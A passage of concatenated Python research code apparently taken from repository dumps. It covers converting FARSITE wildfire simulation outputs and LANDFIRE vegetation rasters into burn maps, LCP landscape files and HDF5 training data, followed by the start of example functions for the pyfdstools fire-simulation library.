windXImg = makeConstImage(smallSz,windX)
windYImg = makeConstImage(smallSz,windY)
lhmImg = makeConstImage(smallSz,lhm)
lwmImg = makeConstImage(smallSz,lwm)
m1hImg = makeConstImage(smallSz,m1h)
m10hImg = makeConstImage(smallSz,m10h)
m100hImg = makeConstImage(smallSz,m100h)
t = dataOut['time']
tOff = 6
tF = lcpData.transform
clims = [[0,1],[-250,250],
[-20,20],[-20,20],
[30,150],[30,150],
[0,40],[0,40],
[0,40],[0,1],
[0,20],[0,20],
[0,0.4],
[0,52],
[0,1],[0,1]]
names = ['Input Fire','Input Elev',
'Input WindX','Input WindY',
'Live Herb M','Live Wood M',
'Moisture 1-h','Moisture 10-h',
'Moisture 100-h','Canopy Cover',
'Canopy Height','Canopy Base Height',
'Canopy Density',
'model',
'Network','Truth']
(t.max()-t.min())/tOff
for i in range(0,t.max(),tOff):
""" This is how command line farsite outputs
"""
try:
startInd = np.argwhere(t-i>=0)[0][0]
endInd = np.argwhere(t-i>=tOff)[0][0]
currentFire = getRasterFromPolygon(dataOut,tF,startInd,1,sz)
nextFire = getRasterFromPolygon(dataOut,tF,endInd,1,sz)
currentFire = downsampleImage(currentFire,interval)
nextFire = downsampleImage(nextFire,interval)
data = [currentFire,elevImg,windXImg,windYImg,lhmImg,lwmImg,m1hImg,m10hImg,m100hImg,canopyImg,canopyHeightImg,canopyBaseHeightImg,canopyDensityImg,fuelImg,nextFire,nextFire]
plotWildfireData(data,names,clims=clims,saveFig=True,saveName=namespace+'_'+str(i)+'_'+str(i+tOff)+'_summary.png')
except:
pass
def generateBurnMap(inDir,lcpNamespace,namespace):
rst = rasterio.open(inDir+lcpNamespace)
meta = rst.meta.copy()
meta.update(driver='GTiff')
meta.update(count=1)
meta.update(nodata=255)
meta.update(crs="EPSG:3759")
meta.update(dtype='uint8')
dataOut = loadFarsiteOutput(namespace)
dataOut = dataOut.reindex(index=dataOut.index[::-1])
with rasterio.open(outDir+namespace.split(inDir)[1]+'.tif','w', **meta) as out:
out_arr = out.read(1)
# this is where we create a generator of geom, value pairs to use in rasterizing
shapes = ((geom,value) for geom, value in zip(dataOut.geometry, dataOut.time))
burned = features.rasterize(shapes=shapes, fill=100, out=out_arr, transform=out.transform)
out.write_band(1, burned)
def _float_feature(value):
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _int64_feature(value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
#def _int64_feature(value):
# return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def writeConstH5(name,elevImg,canopyImg,canopyHeightImg,canopyBaseHeightImg,fuelImg):
hf = h5py.File(outDir+constsName,'w')
hf.create_dataset('elevation',data=elevImg,compression="gzip",compression_opts=9)
hf.create_dataset('canopyCover',data=canopyImg,compression="gzip",compression_opts=9)
hf.create_dataset('canopyHeight',data=canopyHeightImg,compression="gzip",compression_opts=9)
hf.create_dataset('canopyBaseHeight',data=canopyBaseHeightImg,compression="gzip",compression_opts=9) # or /canopyHeightImg
hf.create_dataset('fuelModel',data=fuelImg,compression="gzip",compression_opts=9)
hf.close()
def writeSpecH5(specName,pointData,inputBurnmap,outputBurnmap,constsName):
hf = h5py.File(specName,'w')
hf.create_dataset('pointData',data=pointData,compression="gzip",compression_opts=9)
hf.create_dataset('inputBurnmap',data=inputBurnmap,compression="gzip",compression_opts=9)
hf.create_dataset('outputBurnmap',data=outputBurnmap,compression="gzip",compression_opts=9)
hf.create_dataset('constsName',data=bytes(constsName,'utf-8'),dtype=h5py.special_dtype(vlen=bytes))
hf.close()
def readSpecH5(specName):
hf = h5py.File(specName,'r')
pointData = hf.get('pointData')
inputBurnmap = np.array(hf.get('inputBurnmap'),dtype=np.float)
outputBurnmap = np.array(hf.get('outputBurnmap'),dtype=np.float)
constsName = hf.get('constsName').value.decode('utf-8')
[windX,windY,lhm,lwm,m1h,m10h,m100h] = pointData
hf.close()
hf = h5py.File(specName.split('run_')[0]+constsName,'r')
elev = np.array(hf.get('elevation'),dtype=np.float)
canopyCover = np.array(hf.get('canopyCover'),dtype=np.float)
canopyHeight = np.array(hf.get('canopyHeight'),dtype=np.float)
canopyBaseHeight = np.array(hf.get('canopyBaseHeight'),dtype=np.float)
fuelModel = np.array(hf.get('fuelModel'),dtype=np.float)
data = np.zeros((elev.shape[0],elev.shape[1],13))
data[:,:,0] = inputBurnmap
data[:,:,1] = elev
data[:,:,2] = windX
data[:,:,3] = windY
data[:,:,4] = lhm
data[:,:,5] = lwm
data[:,:,6] = m1h
data[:,:,7] = m10h
data[:,:,8] = m100h
data[:,:,9] = canopyCover
data[:,:,10] = canopyHeight
data[:,:,11] = canopyBaseHeight
data[:,:,12] = fuelModel
return data, outputBurnmap
if __name__ == "__main__":
commandFile = 'commonDir/farsite/example/Panther/runPanther.txt'
inDir = 'E:/projects/wildfire-research/farsite/data/'
outDir = 'E:/projects/wildfire-research/farsite/results/'
inputNames = ['Current Fire','Elevation','Current WindX','Current WindY','Live Herb M','Live Wood M','Moisture 1-h','Moisture 10-h','Moisture 100-h','Canopy Cover','Canopy Height','Crown Ratio','Fuel Model']
files = glob.glob(inDir+"run_*_*_*_*_*_*_Perimeters.shp")
print("Total files: %.0f"%(len(files)))
#assert False, "Stopped"
for i in range(1060,len(files)):#file in files:
try:
#i = -1
file = files[i]
#file = inDir[:-1]+'\\'+'run_0_8_n116-9499_38-9950_25000_out_Perimeters.shp'
namespace = file.split('\\')[1].split('_out_Perimeters.shp')[0]
outNamespace = outDir+namespace+'_p.png'
namespace = inDir+namespace
lcpNamespace = namespace.split('_')[3]+'_'+namespace.split('_')[4]+'_'+namespace.split('_')[5]+'.LCP'
if len(glob.glob(outDir+namespace.split(inDir)[1]+'.tif'))==0:
#generateBurnMap(inDir,lcpNamespace,namespace)
#assert False, "Stopped"
pass
else:
interval = 6
burnmapData = rasterio.open(outDir+namespace.split(inDir)[1]+'.tif')
burnmap = np.array(burnmapData.read_band(1),dtype=np.float)
rInd = int(burnmap.shape[0]/2)
cInd = int(burnmap.shape[1]/2)
burnmap[rInd-2:rInd+2,cInd-2:cInd+2] = -1
maxBurnTime = np.max(burnmap[burnmap <= 200].max())
maxBurnSteps = int(maxBurnTime/interval)
burnmaps = np.zeros((burnmap.shape[0],burnmap.shape[1],maxBurnSteps),dtype=np.float)
for i in range(0,maxBurnSteps):
burnTime = float(i*interval)
burnTemp = burnmap.copy()
burnTemp[burnTemp < burnTime] = -1
burnTemp[burnTemp >= burnTime] = 0
burnTemp[burnTemp == -1] = 1
burnmaps[:,:,i] = burnTemp
#print("Found %s"%(outDir+namespace.split(inDir)[1]+'.tif'))
lcpData = loadFarsiteLcp(inDir+lcpNamespace)
elevImg = np.array(lcpData.read(1),dtype=np.float32)
elevImg = elevImg-np.median(elevImg)
fuelImg = lcpData.read(4)
canopyImg = np.array(lcpData.read(5),dtype=np.float32)/100
canopyHeightImg = np.array(lcpData.read(6),dtype=np.float32)/10
canopyBaseHeightImg = np.array(lcpData.read(7),dtype=np.float32)/10
canopyDensityImg = np.array(lcpData.read(8),dtype=np.float32)/100
sz = elevImg.shape
plt.imshow(burnmaps[:,:,-1])
moistures, weathers, winds = parseFarsiteInput(namespace+'.input')
windSpeed = np.median(winds[:,3])
windDir = np.median(winds[:,4])
windX,windY = convertVector(windSpeed,windDir)
m1h, m10h, m100h, lhm, lwm = parseMoistures(moistures)
sz = elevImg.shape
fuelImg = remapFuelImg(fuelImg)
smallSz = elevImg.shape
#writer = tf.python_io.TFRecordWriter('train.tfrecords')
constsName = lcpNamespace.split('.LCP')[0]+'.h5'
if len(glob.glob('%s%s'%(outDir,constsName))) == 0:
writeConstH5(outDir+constsName,elevImg,canopyImg,canopyHeightImg,canopyBaseHeightImg,fuelImg)
for i in range(0,maxBurnSteps-1):
pointData = np.array([windX,windY,lhm,lwm,m1h,m10h,m100h])
inputBurnmap = np.array(burnmaps[:,:,i],dtype=np.float)
outputBurnmap = np.array(burnmaps[:,:,i+1],dtype=np.float)
specName = outDir+namespace.split(inDir)[1]+'_%0.0f.h5'%(i)
writeSpecH5(specName,pointData,inputBurnmap,outputBurnmap,constsName)
#feature = {'train/label': _int64_feature(np.array(data[:,:,-1],dtype=np.int64).flatten()),
# 'train/image': _float_feature(np.array(data[:,:,:-1]).flatten())}
#example = tf.train.Example(features=tf.train.Features(feature=feature))
#writer.write(example.SerializeToString())
#writer.close()
sys.stdout.flush()
except:
print("Failed: %s"%(file))
```
#### File: datadriven-wildfire-spread/scripts/vegetationTools.py
```python
import matplotlib.pyplot as plt
import osgeo.gdal
import numpy as np
import struct
import matplotlib.path as mpltPath
from collections import defaultdict
import os
def getHistogram(file):
img = osgeo.gdal.Open(file)
band = np.array(img.ReadAsArray(),dtype=np.float32)
return band
def parseLcpHeader(header):
headerDict = dict()
headerDict['nX'] = header[1037]; headerDict['nY'] = header[1038]
headerDict['eastUtm'] = header[1039]; headerDict['westUtm'] = header[1040]
headerDict['northUtm'] = header[1041]; headerDict['southUtm'] = header[1042]
headerDict['gridUnits'] = header[1043];
headerDict['xResol'] = header[1044]; headerDict['yResol'] = header[1045];
headerDict['eUnits'] = header[1046]; headerDict['sUnits'] = header[1047];
headerDict['aUnits'] = header[1048]; headerDict['fOptions'] = header[1049];
headerDict['cUnits'] = header[1050]; headerDict['hUnits'] = header[1051];
headerDict['bUnits'] = header[1052]; headerDict['pUnits'] = header[1053];
headerDict['dUnits'] = header[1054]; headerDict['wUnits'] = header[1055];
headerDict['elevFile'] = header[1056]; headerDict['slopeFile'] = header[1057];
headerDict['aspectFile'] = header[1058]; headerDict['fuelFile'] = header[1059];
headerDict['coverFile'] = header[1060]; headerDict['heightFile'] = header[1061];
headerDict['baseFile'] = header[1062]; headerDict['densityFile'] = header[1063];
headerDict['duffFile'] = header[1064]; headerDict['woodyFile'] = header[1065];
headerDict['description'] = header[1066]
return headerDict
def readLcpFile(filename):
with open(filename,'rb') as f:
data = f.read()
dataFormat = '=llldddd'
for i in range(0,10):
dataFormat = dataFormat+'lll%.0fl'%(100)
dataFormat = dataFormat+'llddddlddhhhhhhhhhh256s256s256s256s256s256s256s256s256s256s512s'
los = []
his = []
nums = []
values = []
names = []
header = struct.unpack(dataFormat,data[:7316])
header2 = parseLcpHeader(header)
crownFuels = header[0]; groundFuels = header[1]; latitude = header[2];
loEast = header[3]; hiEast = header[4]
loNorth = header[5]; hiNorth = header[6]
loElev = header[7]; hiElev = header[8]; numElev = header[9]; elevationValues = header[10:110]; los.append(loElev); his.append(hiElev); nums.append(numElev); values.append(elevationValues); names.append('Elevation')
loSlope = header[110]; hiSlope = header[111]; numSlope = header[112]; slopeValues = header[113:213]; los.append(loSlope); his.append(hiSlope); nums.append(numSlope); values.append(slopeValues); names.append('Slope')
loAspect = header[213]; hiAspect = header[214]; numAspect = header[215]; aspectValues = header[216:316]; los.append(loAspect); his.append(hiAspect); nums.append(numAspect); values.append(aspectValues); names.append('Aspect')
loFuel = header[316]; hiFuel = header[317]; numFuel = header[318]; fuelValues = header[319:419]; los.append(loFuel); his.append(hiFuel); nums.append(numFuel); values.append(fuelValues); names.append('Fuel')
loCover = header[419]; hiCover = header[420]; numCover = header[421]; coverValues = header[422:522]; los.append(loCover); his.append(hiCover); nums.append(numCover); values.append(coverValues); names.append('Cover')
if crownFuels == 21 and groundFuels == 21:
loHeight = header[522]; hiHeight = header[523]; numHeight = header[524]; heightValues = header[525:625]; los.append(loHeight); his.append(hiHeight); nums.append(numHeight); values.append(heightValues); names.append('Canopy Height')
loBase = header[625]; hiBase = header[626]; numBase = header[627]; baseValues = header[628:728]; los.append(loBase); his.append(hiBase); nums.append(numBase); values.append(baseValues); names.append('Canopy Base Height')
loDensity = header[728]; hiDensity = header[729]; numDensity = header[730]; densityValues = header[731:831]; los.append(loDensity); his.append(hiDensity); nums.append(numDensity); values.append(densityValues); names.append('Canopy Density')
loDuff = header[831]; hiDuff = header[832]; numDuff = header[833]; duffValues = header[834:934]; los.append(loDuff); his.append(hiDuff); nums.append(numDuff); values.append(duffValues); names.append('Duff')
loWoody = header[934]; hiWoody = header[935]; numWoody = header[936]; woodyValues = header[937:1037]; los.append(loWoody); his.append(hiWoody); nums.append(numWoody); values.append(woodyValues); names.append('Coarse Woody')
numImgs = 10
elif crownFuels == 21 and groundFuels == 20:
loHeight = header[522]; hiHeight = header[523]; numHeight = header[524]; heightValues = header[525:625]; los.append(loHeight); his.append(hiHeight); nums.append(numHeight); values.append(heightValues); names.append('Canopy Height')
loBase = header[625]; hiBase = header[626]; numBase = header[627]; baseValues = header[628:728]; los.append(loBase); his.append(hiBase); nums.append(numBase); values.append(baseValues); names.append('Canopy Base Height')
loDensity = header[728]; hiDensity = header[729]; numDensity = header[730]; densityValues = header[731:831]; los.append(loDensity); his.append(hiDensity); nums.append(numDensity); values.append(densityValues); names.append('Canopy Density')
numImgs = 8
elif crownFuels == 20 and groundFuels == 21:
loDuff = header[831]; hiDuff = header[832]; numDuff = header[833]; duffValues = header[834:934]; los.append(loDuff); his.append(hiDuff); nums.append(numDuff); values.append(duffValues); names.append('Duff')
loWoody = header[934]; hiWoody = header[935]; numWoody = header[936]; woodyValues = header[937:1037]; los.append(loWoody); his.append(hiWoody); nums.append(numWoody); values.append(woodyValues); names.append('Coarse Woody')
numImgs = 7
else:
numImgs = 5
nX = header[1037]; nY = header[1038]
eastUtm = header[1039]; westUtm = header[1040]
northUtm = header[1041]; southUtm = header[1042]
gridUnits = header[1043];
xResol = header[1044]; yResol = header[1045];
eUnits = header[1046]; sUnits = header[1047];
aUnits = header[1048]; fOptions = header[1049];
cUnits = header[1050]; hUnits = header[1051];
bUnits = header[1052]; pUnits = header[1053];
dUnits = header[1054]; wUnits = header[1055];
elevFile = header[1056]; slopeFile = header[1057];
aspectFile = header[1058]; fuelFile = header[1059];
coverFile = header[1060]; heightFile = header[1061];
baseFile = header[1062]; densityFile = header[1063];
duffFile = header[1064]; woodyFile = header[1065];
description = header[1066]
bodyFormat = ''
for i in range(0,numImgs):
bodyFormat = bodyFormat+'%.0fh'%(nX*nY)
body = np.array(struct.unpack(bodyFormat,data[7316:]))
imgs = np.split(body,numImgs)
for i in range(0,numImgs):
img = body[i::numImgs]
img = np.array(img,dtype=np.float32)
img[img == -9999] = np.nan
imgs[i] = np.reshape(img,(nY,nX),order='C')
return imgs, names, header
def checkPoint(query,polygon=[[-125,42],[-122,34],[-112,36],[-114.5,44]]):
path = mpltPath.Path(polygon)
inside = path.contains_points(query)[0]
return inside
def getHeaderInfo(data):
_,idx = np.unique(data.flatten(),return_index=True)
values = data.flatten()[np.sort(idx)]
if len(values) > 100:
values = values[0:100]
values[-1] = data.flatten()[-1]
num = -1
else:
num = len(values)
tmpData = np.zeros((100,))
tmpData[1:num+1] = np.sort(values)
values = tmpData
values = np.array(values,dtype=np.int16)
lo = int(data[data>-9999].min())
hi = int(data.max())
header = struct.pack('=lll100l',lo,hi,num,*values)
return header, lo, hi, num, values
def generateLcpFile_v2(datas, headers, names, lat=43.0,
gridUnits=0,
eUnits=0,
sUnits=0,
aUnits=2,
fOptions=0,
cUnits=1,
hUnits=3,
bUnits=3,
pUnits=1,
dUnits=0,
wUnits=0):
if datas is not None and headers is not None and names is not None:
sH = [float(x.split(' ')[-1]) for x in headers[0].split('\n')]
crownFuels = 21 if len(datas[1]) > 0 else 20
groundFuels = 21 if len(datas[2]) > 0 else 20
latitude = lat
nCols = sH[0]
nRows = sH[1]
westUtm = sH[2]
southUtm = sH[3]
xResol = sH[4]
yResol = sH[4]
eastUtm = westUtm + xResol*nCols
northUtm = southUtm + yResol*nRows
loEast = westUtm - round(westUtm,-3)
hiEast = loEast + xResol*nCols
loNorth = southUtm - round(southUtm,-3)
hiNorth = loNorth + yResol*nRows
dataFormat = '=llldddd'
header = struct.pack(dataFormat,crownFuels,groundFuels,int(latitude),loEast,hiEast,loNorth,hiNorth)
for i in range(0,5):
data = datas[0][i]
name = names[0][i]
if 'US_ASP2010' in name:
data[data < 0] = -9999
packed, lo, hi, num, values = getHeaderInfo(data)
header = header + packed
if crownFuels == 21:
for data in datas[1]:
packed, lo, hi, num, values = getHeaderInfo(data)
header = header + packed
else:
header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
if groundFuels == 21:
for data in datas[2]:
packed, lo, hi, num, values = getHeaderInfo(data)
header = header + packed
else:
header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
header = header + struct.pack('=lll100l',0,0,0,*np.array(np.zeros((100,)),dtype=np.int16))
header = header+struct.pack('=ll',int(nCols),int(nRows))
header = header+struct.pack('=ddddldd',eastUtm,westUtm,northUtm,southUtm,gridUnits,xResol,yResol)
header = header+struct.pack('=hhhhhhhhhh',eUnits,sUnits,aUnits,fOptions,cUnits,hUnits,bUnits,pUnits,dUnits,wUnits)
#print("Base five names:")
for name in names[0]:
#print(name)
header = header + struct.pack('=256s',str.encode(name))
if crownFuels == 21:
#print("crownFuel names:")
for name in names[1]:
#print(name)
header = header + struct.pack('=256s',str.encode(name))
else:
header = header + struct.pack('=256s',str.encode(''))
header = header + struct.pack('=256s',str.encode(''))
header = header + struct.pack('=256s',str.encode(''))
if groundFuels == 21:
#print("groundFuel names:")
for name in names[2]:
#print(name)
header = header + struct.pack('=256s',str.encode(name))
else:
header = header + struct.pack('=256s',str.encode(''))
header = header + struct.pack('=256s',str.encode(''))
description = 'Automatically generated.'
header = header + struct.pack('=512s',str.encode(description))
imgSize = int(nCols*nRows)
numImgs = int(len(datas[0])+len(datas[1])+len(datas[2]))
totalSize = int(imgSize*numImgs)
allImgs = np.zeros((totalSize))
ct = 0
for data in datas[0]:
allImgs[ct::numImgs] = np.reshape(data,(imgSize))
ct = ct+1
for data in datas[1]:
allImgs[ct::numImgs] = np.reshape(data,(imgSize))
ct = ct+1
for data in datas[2]:
allImgs[ct::numImgs] = np.reshape(data,(imgSize))
ct = ct+1
allImgs = np.array(allImgs,dtype=np.int16)
dataFormat = '=%.0fh'%(totalSize)
body = struct.pack(dataFormat,*allImgs)
return header+body
def queryLandfireFile(file, queryPoint=None, resolution=1500, buildMesh=False):
dataset = osgeo.gdal.Open(file)
band = dataset.GetRasterBand(1)
cols = dataset.RasterXSize
rows = dataset.RasterYSize
transform = dataset.GetGeoTransform()
xOrigin = transform[0]
yOrigin = transform[3]
pixelWidth = transform[1]
pixelHeight = transform[5]
xMax = xOrigin + pixelWidth*cols
yMax = yOrigin + pixelHeight*rows
if queryPoint is None:
queryPoint = ((xOrigin+xMax)/2, (yOrigin+yMax)/2)
x = np.linspace(xOrigin, xMax, int((xMax-xOrigin)/pixelWidth+1))
y = np.linspace(yOrigin, yMax, int((yMax-yOrigin)/pixelHeight+1))
xind = np.argmin(abs(x-queryPoint[0]))
yind = np.argmin(abs(y-queryPoint[1]))
xind01 = int(xind-int((resolution/2)))
yind01 = int(yind-int((resolution/2)))
data = band.ReadAsArray(xind01, yind01, resolution, resolution)
if (data.dtype == np.int16):
data = np.array(data, np.float)
data[data == -9999] = np.nan
else:
data = np.array(data, np.float)
noDataValue = band.GetNoDataValue()
data[np.isclose(data, noDataValue)] = np.nan
if buildMesh:
xind02 = int(xind+int((resolution/2)))
yind02 = int(yind+int((resolution/2)))
xData = x[xind01:xind02]
yData = y[yind01:yind02]
xGrid, yGrid = np.meshgrid(xData, yData)
else:
xGrid = False
yGrid = False
return data, xGrid, yGrid
def getLandfireWkt():
nad83_wkt = """
PROJCS["USA_Contiguous_Albers_Equal_Area_Conic_USGS_version",
GEOGCS["NAD83",
DATUM["North_American_Datum_1983",
SPHEROID["GRS 1980",6378137,298.2572221010042,
AUTHORITY["EPSG","7019"]],
AUTHORITY["EPSG","6269"]],
PRIMEM["Greenwich",0],
UNIT["degree",0.0174532925199433],
AUTHORITY["EPSG","4269"]],
PROJECTION["Albers_Conic_Equal_Area"],
PARAMETER["standard_parallel_1",29.5],
PARAMETER["standard_parallel_2",45.5],
PARAMETER["latitude_of_center",23],
PARAMETER["longitude_of_center",-96],
PARAMETER["false_easting",0],
PARAMETER["false_northing",0],
UNIT["metre",1,
AUTHORITY["EPSG","9001"]]]"""
cs = osgeo.gdal.osr.SpatialReference()
cs.ImportFromWkt(nad83_wkt)
return cs
def getModisWkt():
wgs84_wkt = """
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0,
AUTHORITY["EPSG","8901"]],
UNIT["degree",0.01745329251994328,
AUTHORITY["EPSG","9122"]],
AUTHORITY["EPSG","4326"]]"""
cs = osgeo.gdal.osr.SpatialReference()
cs.ImportFromWkt(wgs84_wkt)
return cs
def getTransformLandfireToModis():
old_cs = getLandfireWkt()
new_cs = getModisWkt()
transform = osgeo.gdal.osr.CoordinateTransformation(old_cs,new_cs)
return transform
def getTransformModisToLandfire():
new_cs = getLandfireWkt()
old_cs = getModisWkt()
transform = osgeo.gdal.osr.CoordinateTransformation(old_cs,new_cs)
return transform
if __name__ == "__main__":
###########################################################################
# USER INPUTS
###########################################################################
# Data naming
prefix = "us_"
yearStr = "130"
indir = "G:\\WildfireResearch\\landfireData\\"
names = ['Canopy Base Height', 'Canopy Base Density', 'Canopy Height',
'Canopy Cover', 'Fuel Model 13', 'Fuel Model 40',
'Aspect', 'Elevation', 'Slope']
ids = ['cbh', 'cbd', 'ch', 'cc', 'fbfm13', 'fbfm40', 'asp_2016', 'dem_2016', 'slpd_2016']
# Ouptut options
resolution = 1000
#queryPoint = np.array([-2144805, 1565987, 0.0], dtype=np.float) # Same point in meters
queryPoint = np.array([-121.896571, 38.030451, 0.0], dtype=np.float) # Same point in degrees
queryPoint = np.array([-116.680072, 32.808536, 0.0], dtype=np.float) # Same point in degrees
queryPointUnits = 'degree' # either degree or meter
axisType = 'kilometer' # either degree, meter, or kilometer
displayType = 'contour' # either contour or image
###########################################################################
# END USER INPUTS
###########################################################################
# Example transformation from LANDFIRE coordinate system to standard latitude/longitude
if queryPointUnits == 'meter':
transform1 = getTransformLandfireToModis()
qp_lon, qp_lat, _ = transform1.TransformPoint(queryPoint[0], queryPoint[1], queryPoint[2])
qp = queryPoint
elif queryPointUnits == 'degree':
transform1 = getTransformLandfireToModis()
transform2 = getTransformModisToLandfire()
qp_x, qp_y, qp_z = transform2.TransformPoint(queryPoint[0], queryPoint[1], queryPoint[2])
qp = np.array([qp_x, qp_y, qp_z], dtype=np.float)
# Initialize parameters for looping over data queries
datas = defaultdict(bool)
buildMesh = True
# Read rest of data query
for i in range(0, len(ids)):
did = ids[i]
file = "%s%s%s%sGrid%s%s%s%sw001000.adf"%(indir, prefix, did, os.sep, os.sep, prefix, did, os.sep)
if not os.path.exists(file):
file = "%s%s%s%s%sGrid2%s%s%s%s%sw001000.adf"%(indir, prefix, yearStr, did, os.sep, os.sep, prefix, yearStr, did, os.sep)
if not os.path.exists(file):
print("Unable to find file: %s"%(file))
print(file)
data, tmp1, tmp2 = queryLandfireFile(file, queryPoint=qp, resolution=resolution, buildMesh=buildMesh)
if buildMesh:
# Only build grid on first data query
(xGrid, yGrid) = (tmp1, tmp2)
buildMesh = False
datas[names[i]] = data
# Build latitude and longitude arrays if plotting in degrees
if axisType == 'degree':
sz = xGrid.shape
xGrid_rs = np.reshape(xGrid,(xGrid.shape[0]*xGrid.shape[1],))
yGrid_rs = np.reshape(yGrid,(yGrid.shape[0]*yGrid.shape[1],))
points = np.array([xGrid_rs,yGrid_rs]).T
latlong = np.array(transform1.TransformPoints(points))
lat = np.reshape(latlong[:,1],(sz[0],sz[1]))
lon = np.reshape(latlong[:,0],(sz[0],sz[1]))
# Visualize data
totR = 3
totC = 3
fs = 16
fig, ax = plt.subplots(totR, totC, figsize=(18,12))
for i in range(0, len(ids)):
plotC = (i % totC)
plotR = int((i-(i % totC))/totC)
if (axisType == 'degree') and (displayType == 'contour'):
ax[plotR][plotC].set_xlabel('Longitude $\mathrm{(^{\circ})}$', fontsize=fs)
ax[plotR][plotC].set_ylabel('Latitude $\mathrm{(^{\circ})}$', fontsize=fs)
(xPlot, yPlot, decimals) = (lon, lat, 2)
elif axisType == 'meter' and (displayType == 'contour'):
ax[plotR][plotC].set_xlabel('X-Position (m)', fontsize=fs)
ax[plotR][plotC].set_ylabel('Y-Position (m)', fontsize=fs)
(xPlot, yPlot, decimals) = (xGrid, yGrid, 0)
elif axisType == 'kilometer' and (displayType == 'contour'):
ax[plotR][plotC].set_xlabel('X-Position (km)', fontsize=fs)
ax[plotR][plotC].set_ylabel('Y-Position (km)', fontsize=fs)
(xPlot, yPlot, decimals) = (xGrid/1000, yGrid/1000, 1)
else:
(xPlot, yPlot, decimals) = (xGrid, yGrid, 0)
(xmn, xmx, xavg) = (xPlot.min(), xPlot.max(), (xPlot.max() + xPlot.min())/2)
(ymn, ymx, yavg) = (yPlot.min(), yPlot.max(), (yPlot.max() + yPlot.min())/2)
(xmn, xmx, xavg) = (np.round(xmn, decimals), np.round(xmx, decimals), np.round(xavg, decimals))
(ymn, ymx, yavg) = (np.round(ymn, decimals), np.round(ymx, decimals), np.round(yavg, decimals))
if displayType == 'contour':
im = ax[plotR][plotC].contourf(xPlot, yPlot, datas[names[i]], 25, cmap='jet_r')
ax[plotR][plotC].set_xticks([xmn, xavg, xmx])
ax[plotR][plotC].set_yticks([ymn, yavg, ymx])
ax[plotR][plotC].tick_params(labelsize=fs)
cbar = plt.colorbar(im, ax=ax[plotR][plotC])
ticklabs = cbar.ax.get_yticklabels()
cbar.ax.set_yticklabels(ticklabs, fontsize=fs)
elif displayType == 'image':
im = ax[plotR][plotC].imshow(datas[names[i]], cmap='jet_r')
ax[plotR][plotC].set_title(names[i], fontsize=fs)
ax[plotR][plotC].ticklabel_format(useOffset=False, style='plain')
plt.tight_layout()
plt.show()
# Build LCP file for FARSITE
dictNames1 = ['Elevation', 'Slope', 'Aspect', 'Fuel Model 40', 'Canopy Cover']
lcpNames1 = ['Elevation', 'Slope', 'Aspect', 'Fuel', 'Cover']
dictNames2 = ['Canopy Height', 'Canopy Base Height', 'Canopy Base Density']
lcpNames2 = ['Canopy Height', 'Canopy Base Height', 'Canopy Density']
imgs1 = []
for dictName, lcpName in zip(dictNames1, lcpNames1):
imgs1.append(np.array(datas[dictName], dtype=np.int16))
imgs2 = []
for dictName, lcpName in zip(dictNames2, lcpNames2):
imgs2.append(np.array(datas[dictName], dtype=np.int16))
nCols = imgs1[0].shape[1]
nRows = imgs1[0].shape[0]
xll = xGrid.min()
yll = yGrid.min()
fileDx = xGrid[0,1]-xGrid[0,0]
headers = []
for name in lcpNames1:
header = ['ncols %.0f\n'%(nCols),
'nrows %.0f\n'%(nRows),
'xllcorner %.12f\n'%(xll),
'yllcorner %.12f\n'%(yll),
'cellsize %.12f\n'%(fileDx),
'NODATA_value %.0f'%(0)]
stringHeader = ''
for line in header:
stringHeader = stringHeader+line
headers.append(stringHeader)
text = generateLcpFile_v2([imgs1, imgs2, []], headers, [lcpNames1, lcpNames2, []])
with open('test.LCP', 'wb') as f:
f.write(text)
imgs, names, header = readLcpFile("test.LCP")
``` |
{
"source": "johodges/pyfdstools",
"score": 2
} |
#### File: johodges/pyfdstools/examples.py
```python
import pyfdstools as fds
import os
from collections import defaultdict
import numpy as np
def exampleImportFile(fdsPath=None):
if fdsPath is None:
systemPath = os.path.dirname(os.path.abspath(__file__))
fdsPath = os.path.join(systemPath, "examples", "case001.fds")
fdsFile = fds.fdsFileOperations()
print("\tStarting to import file from %s"%(fdsPath))
fdsFile.importFile(fdsPath)
print("\tFinished importing file.")
return fdsFile
def exampleSaveFile(file=None, outdir=None, outname=None):
if file is None:
file = exampleImportFile()
if outdir is None:
systemPath = os.path.dirname(os.path.abspath(__file__))
outdir = os.path.join(systemPath, "generated")
if outname is None:
location = os.path.join(outdir, '%s.fds'%(file.head['ID']['CHID']))
print("\tStarting to save model.")
file.saveModel(1, location, allowMeshSplitting=False)
print("\tFinished saving model.")
return location
def exampleErrorCalculation():
data, keys = fds.readErrorTable()
errorvalues = fds.calculatePercentile([100, 200, 300, 400, 500, 600], 'Plume Temperature', 0.95, fdsVersion='6.7.1')
fig, ax1 = fds.plotPercentile(500, 'Plume Temperature', fdsVersion='6.7.1')
return errorvalues
def exampleReadSlcf2dResults(resultDir=None, chid=None,
fdsQuantities = ['TEMPERATURE'],
tStart=0, tEnd=120):
if (resultDir is None) and (chid is None):
systemPath = os.path.dirname(os.path.abspath(__file__))
chid = "case001"
resultDir = os.path.join(systemPath, "examples", "%s.zip"%(chid))
datas = defaultdict(bool)
for qty in fdsQuantities:
grid, data, times = fds.readSLCF2Ddata(chid, resultDir, qty)
tStartInd = np.argwhere(times >= tStart)[0][0]
tEndInd = np.argwhere(times <= tEnd)[-1][0]
data_tavg = np.nanmean(data[:, :, :, tStartInd:tEndInd], axis=3)
datas[qty] = data_tavg.copy()
datas['GRID'] = grid
datas['TIMES'] = times
return datas
def exampleExtract2dFromSlcf2d(datas,
fdsQuantities = ['TEMPERATURE'],
fdsUnits = ['C'],
axis=1, value=2.5,
qnty_mn=20, qnty_mx=150):
datas2D = defaultdict(bool)
for qty, unit in zip(fdsQuantities, fdsUnits):
x, z, data_slc = fds.findSliceLocation(datas['GRID'], datas[qty], axis, value)
datas2D[qty] = data_slc
fig = fds.plotSlice(x, z, data_slc, axis,
qnty_mn=qnty_mn, qnty_mx=qnty_mx,
